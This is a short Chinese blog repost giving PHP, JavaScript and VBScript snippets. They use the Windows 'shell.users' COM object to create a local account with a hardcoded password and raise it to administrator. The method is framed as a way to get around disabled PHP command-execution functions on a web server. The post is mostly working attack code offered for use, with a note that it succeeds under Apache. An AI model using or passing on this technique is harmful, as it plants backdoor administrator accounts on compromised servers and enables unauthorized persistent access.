欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

php版shell.users加管理员帐号的方法

程序员文章站 2022-07-03 09:58:20
09年的时候 LCX 写出了 js版 和vbs 版的shell.users 加管理员帐号的方法,后来我就想把它改成PHP 版,由于对代码分析得不够准确,所以到最近才写出来... 11-06-15...
当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。

代码如下:

复制代码
代码如下:

<?php
echo "<div align=center><b>php 版shell.users加管理员帐号</b></div>";
$username="iceskin";
$password="skin.com";
$su = new com("shell.users");
$h=$su->create($username);
$h->changepassword($password,"");
$h->setting["accounttype"] = 3;//这句很重要可以把用户加入administrators 组,
?>

对apache 搭建的web 服务器可以执行成功,iis 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。

下面是 lcx 的代码

js:
var o=new activexobject( "shell.users" );
z=o.create("test") ;
z.changepassword("123456","")
z.setting("accounttype")=3;


vbs:
set o=createobject( "shell.users" )
set z=o.create("test")
z.changepassword "123456",""
z.setting("accounttype")=3

hi.baidu.com/南拳daddy